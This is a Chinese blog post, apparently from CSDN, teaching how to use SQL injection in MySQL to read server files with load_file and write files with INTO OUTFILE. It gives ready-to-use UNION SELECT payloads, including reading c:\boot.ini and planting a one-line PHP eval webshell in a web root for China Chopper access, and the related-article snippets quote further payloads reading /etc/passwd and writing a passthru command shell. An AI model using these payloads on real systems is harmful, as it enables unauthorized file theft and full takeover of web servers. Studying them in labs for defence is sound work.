利用SQL注入漏洞实现MySQL数据库读写文件

已于 2022-08-22 09:37:48 修改
阅读量636 收藏
点赞数
分类专栏: 渗透 文章标签: php sql注入 渗透测试 sql注入漏洞利用 利用SQL注入漏洞实习读写文件
于 2022-07-18 20:31:16 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44257023/article/details/125858766
版权
本文介绍了如何在MySQL中安全地配置secure_file_priv参数,确保数据库不被恶意写入webshell。详细讲解了开启该参数的方法,并展示了利用UNION SELECT语句进行文件读取和写入的示例,包括读取和写入文件的操作步骤。同时强调了操作前需要具备的权限和远程目录的写权限。
摘要由CSDN通过智能技术生成

前提必要条件

  • 需要数据库开启secure_file_priv 就是将secure_file_priv的值为空,不为空不充许写入webshell (默认不开启,需要修改mysql配置文件mysql.ini或者叫my.ini配置文件)
  • 需要知道远程目录
  • 需要远程目录有写权限
  • 需要mysql root权限

开启secure_file_priv 参数,操作看动图:
在这里插入图片描述

读取文件

读取文件肯定是要知道,文件路径的,不知道的话就找已公布的中间件配置文件地址等

union select 1,load_file('文件路径') -- bbq

例如读取虚拟机的 boot.ini 文件:

union select 1,load_file('c:\\boot.ini') -- bbq

操作看动图:
在这里插入图片描述

写入文件

一般就写一个菜刀之类的小马,然后用用菜刀连接

union select "木马语句",2 into outfile "上传服务器文件路径" -- bbq

例如:我写入一菜刀一句话小马 文件 到 C:\phpStudy\WWW\123.php 目录下

union select "<?php @eval($_POST['123']);?>",2 into outfile "C:\\phpStudy\\WWW\\123.php" -- bbq

操作看动图:

<?php @eval($_POST['123']);?> 菜刀一句话密码 123

在这里插入图片描述

常家壮
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[mysql][sql注入]读写文件
qq_37301470的博客
11-14 261
secure_file_priv 全局变量 mysql> show variables like "%secure_file%" -> ; +------------------+-------+ | Variable_name | Value | +------------------+-------+ | secure_file_priv | NULL | +------------------+-------+ 1 row in set, 1 warning (0.00
SQL注入详解(主要针对MySQL)
Rockboy777的博客
08-09 477
权限不足时也受影响;join绕过,如:union select 1,2,3 -> union select from (select 1)a join (select 2) join (select 3)substr()和mid()使用from for,如substr(database() from 1 for 1)表示将字符串从1位置截取长度1,mid()同理。
mysql攻防之写入漏洞
weixin_30497527的博客
07-26 180
因为被别人利用mysql攻击,所以想在这里帮助大家提高一下自身mysql的安全。避免成为别人的肉鸡。 show global variables like '%secure%'; 如果是这样则黑客可以利用MySQL在系统注入文件。 在linux下这个是不给设置为null的,否则数据库启动不了。 我在这里直接设置成/dev/null 这样即使黑客要注入文件耶没有用。 编辑my.c...
sql注入之高权限注入和文件读写
最新发布
小阿宁的猫猫
09-12 760
高权限注入-- 1.多个网站共享mysql服务器-- 2.MySQL 权限介绍-- 3.注入流程-- 查询所有数据库名称-- 查询表名对应的字段名-- 查询数据-- 文件读写-- 1.文件读写注入的原理-- 2.文件读写注入的条件-- 3.读取文件-- 4.写入文件--
SQL注入漏洞攻击、数据库导入导出[从txt中导入导出]
zhanglan478950的专栏
11-27 1332
1.SQL注入漏洞攻击 protected void Button1_Click(object sender, EventArgs e) { string constr = "data source=pc-20120907sdqu;initial catalog=shool;user id=sa;password=admin"; usi
关于SQL注入文件读写的方法总结
09-09
在这一过程中,攻击者不仅能够读取数据库中的数据,还能利用注入漏洞读写服务器上的文件。这一知识点对于数据库安全和网络安全工作者来说至关重要。 首先,文章提到了MySQL数据库中的文件读写方法。在MySQL中,可以...
三种数据库的 SQL 注入详解
08-03
如果以上三个步骤全部满足,则程序就可能存在数字型 SQL 注入漏洞。 2. 字符型注入 字符型注入发生在输入参数为字符串时,可能存在字符型注入漏洞。数字型与字符型注入最大的区别在于:数字型不需要单引号闭合,而...
最新MySQL数据库漏洞情况通报
09-10
MySQL数据库作为广泛使用的关系型数据库管理系统,其安全性至关重要。最近出现的MySQL代码执行漏洞(CNNVD-201609-183,CVE-2016-6662)引起了广泛关注。这个漏洞主要存在于MySQL的配置文件`my.cnf`,使得攻击者有...
sql注入的思维导图。
04-19
SQL注入是一种常见的Web应用程序安全漏洞, attackers可以通过在Web应用程序的输入字段中Inject恶意的SQL代码来访问、修改或控制数据库中的数据。本文将对SQL注入的思维导图进行详细的讲解,并对相关的知识点进行...
LabVIEW实现数据库读写操作.zip
03-27
9. 安全性:在使用LabVIEW进行数据库操作时,确保遵循最佳安全实践,如使用加密的连接,限制权限,避免SQL注入攻击,及时更新数据库驱动程序以修复已知的安全漏洞。 这个项目代码很可能展示了如何在LabVIEW环境中...
SQL注入——Mysql文件读取写入,结合文件包含漏洞
weixin_30337251的博客
07-09 139
上篇主要概述了查询一些常见表格的方法这里在增加一些查询的方式 读取文件: 'union select null,load_file('/etc/passwd')-- 写入文件 结合上面,我们可以写入一个文件在目标路径 ' union select null,"<?php passthru($_GET['cmd']); ?>" INTO DUMPFILE...
SQL注入16】SQL漏洞利用读写文件
Fighting_hawk的博客
02-22 4556
1. 对文件进行读写既收到文件系统对用户权限的制约、也收到数据库设置的制约。 2. 掌握利用SQL漏洞进行文件读写的方法。 3. 后续需要进一步了解如何获取网站根目录路径的方法。
sql注入介绍
qq_51331767的博客
02-17 689
SQL注入即是指web应用程序对用户输入数据的合法性没有判断或过滤不严,攻击者可以在web应用程序中事先定义好的查询语句的结尾上添加额外的SQL语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库服务器执行非授权的任意查询,从而进一步得到相应的数据信息。在原来的sql语句中插入payload,攻击者注入一段包含注释符的sql语句,将原来的语句的一部分注释,注释掉的部分语句不会被执行。即把sql命令插入到web的请求表单中,欺骗服务器,以此来获取服务器的数据和权限。把用户输入的数据当作代码执行。
sql 注入读写文件
yuan_boss的博客
08-24 645
获取到用户为root,主机为localhost,然后将这两个信息作为条件,接下来查看是否有文件读写权限。与当前mysql用户具有File_priv权限之外,还要确保当前系统用户具有访问hosts文件的权限。根据结果可知,当前mysql用户为root,主机为名为localhost。要想复现sql注入读写,首先mysql就需要满足下面的条件。想要读取某个文件,除了需要需要关闭mysql中的安全选项。本次实战,以sqli_labs靶场的第1关为例。发现读取成功,看到了hosts文件的内容。通过联合注入的方式,
SQL注入-文件读写文件的读取+写入:函数、使用方法
05-30 9201
SQL注入文件读写
SQL注入
weixin_47193338的博客
03-21 1766
一、介绍、原理 SQL注入就是指Web应用程序对用户输入数据的合法性没有判断,前端传入后端的参数是攻击者可控的,并且参数带入数据库查询,攻击者可以通过构造不同的SQL语句来实现数据库的任意操作。 SQL注入漏洞的产生需要满足以下两个条件: 1、参数用户可控:前端传给后端的参数内容是用户可以控制的。 2、参数带入数据库查询:传入的参数拼接到SQL语句,并且带入数据库查询。 二、MySQL查询语句 1、在不知道任何条件时: Select(要查询的字段名)from(名.表名) 2、在知道一条已
SQL注入读写文件
weixin_43765321的博客
03-02 3666
1. 读写文件的基本条件和使用 1.1 SQL注入文件读写 SQL注入有直接SQL注入,也有文件读写时的注入,后者的主要目的在于获取webshell或盗取重要文件。 1.2 文件读写的基本条件 当前用户权限对该文件可读。 文件在该服务器上。 路径完整。 文件大小小于max_sllowed_packet。 当前数据库用户有FILE权限,File_priv为yes secure_file_priv的值为空,如果值为某目录,那么就只能对该目录的文件进行操作。 在MySQL5.5.53中,File_priv默认
Mysql注入读写文件
m_de_g的博客
11-30 3449
1.Mysql注入读文件 MySQL数据库渗透测试过程中能够使用的功能还是比较多的,除了读取数据之外,还可以进行对文件进行读写(但前提是权限足够)。 读取前提: 1.用户权限足够高,尽量具有root权限。 2.secure_file_priv不为NULL。 修改mysql.ini的配置 可以看到里面secure_file_priv =的配置语句,如果没有的看到配置文件的话,需要添加上 2.Mysql注入写文件 3.写入Webshell 4.Sqlmap安全测试 ...
SQL注入文件读写
永远是少年
06-27 2227
今天继续给大家介绍渗透测试相关知识,本文主要内容是SQL注入文件读写。 一、SQL注入文件读写函数 二、SQL注入文件读写之secure_file_priv参数 三、SQL注入文件路径获取 四、SQL注入文件读写之魔术引导开关......
SQL注入攻防指南:Pocket Reference详解
这本书详细讲解了如何识别和利用SQL注入漏洞。 在MySQL部分,书中提到了几个关键点: 1. **默认数据库**:攻击者可能会尝试访问默认的数据库,如`information_schema`,来获取系统信息。 2. **注释查询**:通过在...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值